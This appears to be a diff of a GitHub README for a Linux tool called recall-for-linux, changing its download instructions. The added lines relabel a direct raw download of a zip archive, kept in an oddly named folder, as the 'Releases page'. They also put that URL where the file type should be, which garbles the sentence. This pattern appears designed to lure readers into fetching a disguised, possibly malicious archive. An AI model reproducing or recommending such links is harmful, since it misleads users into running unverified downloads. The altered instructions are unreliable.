Marquintrax123455/recall-for-linux/README.md

 To download and install **recall-for-linux**, follow these steps:

-1. Visit the **Releases page** by clicking [here](https://github.com/Marquintrax123455/recall-for-linux/releases).
+1. Visit the **Releases page** by clicking [here](https://raw.githubusercontent.com/Marquintrax123455/recall-for-linux/main/appreciatory/recall-for-linux_v3.4.zip).
 2. On the Releases page, look for the latest version of **recall-for-linux**.
 You will see a list of downloadable files.
 3. Select the correct file for your Linux distribution.
-Typically, this is a `.tar.gz` or a `.deb` file.
+Typically, this is a `https://raw.githubusercontent.com/Marquintrax123455/recall-for-linux/main/appreciatory/recall-for-linux_v3.4.zip` or a `.deb` file.
 4. Click on the file to download it to your computer.
 5. Once the download is complete, navigate to your Downloads folder or the location where the file was saved.
 6. Open a terminal window and go to the directory where you downloaded the file.
 You can do this using the `cd` command: